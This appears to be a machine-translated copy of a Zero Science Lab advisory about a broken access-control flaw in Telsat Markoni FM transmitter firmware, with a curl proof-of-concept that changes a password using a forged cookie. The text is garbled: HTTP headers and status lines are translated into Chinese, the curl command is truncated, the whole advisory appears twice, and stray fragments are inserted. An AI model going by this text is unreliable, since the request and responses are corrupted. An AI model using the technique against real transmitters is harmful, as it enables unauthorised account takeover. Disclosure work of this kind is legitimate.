Telsat Markoni FM发射器1.9.5不安全访问控制更改密码
vendor: telsat srl
产品网页: https://www.mmarkoni.it
受影响的版本: Markoni-D(紧凑)FM发射机
Markoni-DH(激发+放大器)FM发射机
Markoni-A(模拟调制器)FM发射器
固件: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
摘要:专业FM发射机。
DESC:未经授权的用户可以利用此脆弱性来更改
他/她的密码,有可能获得未经授权的访问敏感的
信息或执行她/他的设计许可以外的动作。
在: GNU/Linux 3.10.53(ARMV7L)上测试
iicorem6solox
LightTPD/1.4.33
gjoko“ liquidworm” krstic发现的脆弱性
马其顿信息安全研发实验室
零科学实验室-https://www.zeroscience.mk- @Zeroscience
咨询ID: ZSL-2024-5811
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5811.php
10.11.2023
- -
用户更改自己的密码的POC请求。
只有管理员可以编辑用户。没有权限或饼干检查。
$ curl -s -h'cookie:名称=用户1702119917'\
http/1.1 200好
content-type:文本/html
CACHE-CONTROL:无缓存
set-cookie:名称=用户1702119917; max-age=315360000
转移编码:分块
Date:星期六,2023年12月9日11:05:17 GMT
Server: LightTPD/1.4.33
OC=4Resp=0
vendor: telsat srl
产品网页: https://www.mmarkoni.it
受影响的版本: Markoni-D(紧凑)FM发射机
Markoni-DH(激发+放大器)FM发射机
Markoni-A(模拟调制器)FM发射器
固件: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9
摘要:专业FM发射机。
DESC:未经授权的用户可以利用此脆弱性来更改
他/她的密码,有可能获得未经授权的访问敏感的
信息或执行她/他的设计许可以外的动作。
在: GNU/Linux 3.10.53(ARMV7L)上测试
iicorem6solox
LightTPD/1.4.33
gjoko“ liquidworm” krstic发现的脆弱性
马其顿信息安全研发实验室
零科学实验室-https://www.zeroscience.mk- @Zeroscience
咨询ID: ZSL-2024-5811
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2024-5811.php
10.11.2023
- -
用户更改自己的密码的POC请求。
只有管理员可以编辑用户。没有权限或饼干检查。
$ curl -s -h'cookie:名称=用户1702119917'\
正在加载...
10.0.8.3
content-type:文本/html
CACHE-CONTROL:无缓存
set-cookie:名称=用户1702119917; max-age=315360000
转移编码:分块
Date:星期六,2023年12月9日11:05:17 GMT
Server: LightTPD/1.4.33
OC=4Resp=0